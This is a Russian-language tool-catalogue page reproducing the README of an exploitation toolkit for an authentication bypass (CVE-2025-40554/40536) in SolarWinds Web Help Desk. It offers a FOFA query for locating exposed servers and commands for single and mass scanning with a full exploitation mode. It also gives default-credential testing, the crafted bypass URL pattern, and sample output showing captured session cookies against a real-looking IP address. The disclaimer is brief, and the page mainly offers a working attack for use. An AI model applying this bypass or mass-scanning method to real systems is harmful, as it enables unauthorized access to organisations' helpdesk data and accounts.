Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-40554 — Эксплуатация CVE-2025-40554 | Kitploit
Инструменты/GitHubGitHub/skynoxk/cve-2025-40554
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификация
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

Эксплуатация CVE-2025-40554

Репозиторий
27 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-40554 Набор инструментов для эксплуатации

Комплексный инструмент для тестирования безопасности, предназначенный для обнаружения и эксплуатации уязвимости обхода аутентификации (CVE-2025-40554 / CVE-2025-40536) в SolarWinds Web Help Desk.

⚠️ Отказ от ответственности

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ЦЕЛЕЙ ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ

Данный инструмент предоставляется для исследования безопасности, пентеста и оценки уязвимостей в системах, которые вам принадлежат или на тестирование которых у вас есть явное письменное разрешение. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.

🔍 Обзор уязвимости

CVE-2025-40554 — критическая уязвимость обхода аутентификации в SolarWinds Web Help Desk, позволяющая неавторизованным злоумышленникам:

  • Обходить механизмы аутентификации
  • Получать доступ к привилегированным административным функциям (Аутентификация)
  • Перечислять конфигурацию системы

Затронутые версии

  • SolarWinds Web Help Desk (информацию о конкретной версии следует уточнить)
  • Проверьте бюллетени безопасности SolarWinds для получения исправленных версий

🚀 Функции

Проверьте сами :))

Зависимости:

  • Python 3.6+
  • библиотека requests
  • библиотека urllib3

🛠️ Установка

root@kitploit:~
# Клонируйте или загрузите скрипт
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Сделайте исполняемым
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Использование

Базовое сканирование (одиночная цель)

root@kitploit:~
# Простая проверка уязвимости
python3 CVE-2025-40554.py -t https://target:8443

# С явным указанием протокола
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Режим полной эксплуатации

root@kitploit:~
# Полная эксплуатация с перечислением сессий
python3 CVE-2025-40554.py -t https://target:8443 --exploit

# Пропустить тестирование учётных данных по умолчанию
python3 CVE-2025-40554.py -t https://target:8443 --exploit --no-login

Массовое сканирование

root@kitploit:~
# Сканирование нескольких целей из файла
python3 CVE-2025-40554.py -l targets.txt

# Массовое сканирование с эксплуатацией
python3 CVE-2025-40554.py -l targets.txt --exploit

# Тихий режим (минимальный вывод)
python3 CVE-2025-40554.py -l targets.txt -q

# Пользовательский выходной файл
python3 CVE-2025-40554.py -l targets.txt -o results.txt

Формат файла с целями

targets.txt:

root@kitploit:~
https://target1:8443
https://target2.example.com:8443
192.168.1.100:8443
target3.local:8443
# Комментарии поддерживаются

🎯 Параметры командной строки

📊 Примеры вывода

Успешная эксплуатация

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Target: https://203.106.221.203:8443
======================================================================
[*] Step 1: Establishing session...
[+] WOSID extracted: AbCdEfGhIjKlMnOpQrStU
[+] XSRF token: abc123-def456-ghi789

[*] Step 2: Testing authentication bypass...
[+] Found bypass indicators: externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNERABLE - Auth bypass confirmed!

[*] Step 3: Testing default credentials (client/client)...
[+] SUCCESS - Default credentials work!

======================================================================
EXPLOITATION MODE - CVE-2025-40554 Auth Bypass
======================================================================

[*] Bypass URL: https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Triggering authentication bypass...
[+] Auth bypass successful!

[*] Session Cookies:
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
SUMMARY
======================================================================
[+] Target is VULNERABLE to CVE-2025-40554
[+] Default credentials: WORK
======================================================================

Результаты массового сканирования

root@kitploit:~
[*] Loaded 5 unique targets from targets.txt
[*] Mode: Bypass + default credential test
[*] Full exploitation enabled

[1/5] Testing https://target1:8443
[+] VULNERABLE - Auth bypass confirmed!
[+] SUCCESS - Default credentials work!

[2/5] Testing https://target2:8443
[!] NOT VULNERABLE - Auth bypass failed

...

======================================================================
SCAN SUMMARY
======================================================================
Total scanned:     5/5
Vulnerable:        2
With def. creds:   1
======================================================================

[+] Results saved to: vulnerable_targets.txt

🔧 Технические детали

Процесс эксплуатации

  1. Установление сессии

    • Подключается к экземпляру WHD
    • Извлекает WOSID (WebObjects Session ID) из нескольких источников
    • Захватывает XSRF-токен (если присутствует)
  2. Обход аутентификации

    • Формирует вредоносный URL с внедрением WOSID
    • Эксплуатирует path traversal в маршрутизации WebObjects
    • Обходит проверки аутентификации
  3. Тестирование учётных данных (опционально)

    • Анализирует форму входа с защитой CSRF
    • Тестирует учётные данные по умолчанию (client/client)
    • Подтверждает успешную аутентификацию
  4. Полная эксплуатация (режим --exploit)

    • Экспортирует куки сессии
    • доступ к email, тикетам, БД, пользователям (удалено)

Индикаторы уязвимости

Инструмент обнаруживает успешный обход, проверяя следующие признаки:

  • externalAuthContainer — внешняя конфигурация аутентификации
  • JSONRpcClient — открытие API-клиента
  • SAML 2.0 — конфигурация SSO
  • LoginPref — настройки предпочтений входа
  • authMode — настройки режима аутентификации

🤝 Вклад в проект

Вклад приветствуется…..

📚 Ссылки

  • Подробности CVE-2025-40554
  • Подробности CVE-2025-40536
  • Бюллетени безопасности SolarWinds
  • Документация по фреймворку WebObjects

📄 Лицензия

Этот инструмент предоставляется «как есть» без каких-либо гарантий. Используйте на свой страх и риск.

👤 Автор

Skynoxk


Помните: Всегда занимайтесь взломом этично и законно. Несанкционированный доступ — преступление.

Скачать инструмент
ПараметрОписание
-t, --target URLURL одной цели для тестирования
-l, --list FILEФайл со списком целей (по одной на строку)
--exploitВключить полный режим эксплуатации с перечислением
--no-loginПропустить тестирование учётных данных по умолчанию
-o, --output FILEВыходной файл для уязвимых целей (по умолчанию: vulnerable_targets.txt)
-q, --quietРежим минимального вывода (полезен для массового сканирования)